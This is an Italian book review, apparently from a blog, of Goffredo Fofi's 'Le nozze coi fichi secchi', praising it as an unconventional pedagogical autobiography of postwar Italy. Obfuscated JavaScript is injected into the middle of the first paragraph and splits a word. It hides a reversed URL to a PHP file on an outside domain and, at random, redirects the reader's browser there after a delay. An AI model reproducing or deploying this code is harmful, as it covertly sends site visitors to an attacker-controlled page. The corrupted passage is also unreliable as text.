Goffredo Fofi, Le nozze coi fichi secchi

image_pdfimage_print

Squarci di un’altra storia, diversa da quella ufficiale e «maggioritaria», che attraversa continuamente le storie e la storia della seconda metà del secolo, vengono narrati: l’Umbria e la fine del mondo contadino, la Sicilia anni Cinquanta dei b (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}anditi e del sottoproletariato, la memoria e gli esiti della resistenza, la Parigi delle nouvelles vagues, gli anni sessanta tra sud e nord, le ultime grandi lotte operaie, l’immigrazione interna e l’esplosione del Sessantotto con le sue derive politiche, la Napoli dei bambini e dei disoccupati, il volontariato e la morte della sinistra, la storia delle riviste degli intellettuali e degli educatori, in uno scenario di “persone attive e positive che hanno cercato di trasformare in meglio il loro e il nostro mondo” reagendo a ingiustizie sociali e apatia morale culturale politica di ieri e di oggi.
Questo libro di Goffredo Fofi più che interessante è imprescindibile per chi voglia avere un quadro dell’Italia degli ultimi decenni e un’idea (formata) del Goffredo nazionale. Il libro si presenta come un’ “autobiografia pedagogica” attraverso ricordi, ma un’autobiografia impropria, fuori le righe, come altro non poteva essere “qualcosa” di Goffredo.
Questi ricordi-memorie sono costituiti da rapporti personali – quasi sempre culminati o intervallati da un litigio -, amori letterari, passione politica e sociale. Questo è un altro aspetto della bellezza di “Le nozze coi fichi secchi”: momenti struggenti che le varie biografie (per quanto solo accennate) possono regalare al lettore attento e senza pregiudizi.
Ovviamente il volume qui presentato lo potete trovare, con lo sconto del 10%, presso la Bottega delle economie solidali di EquAzione, in via Lombardia 1p, alle Piagge.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *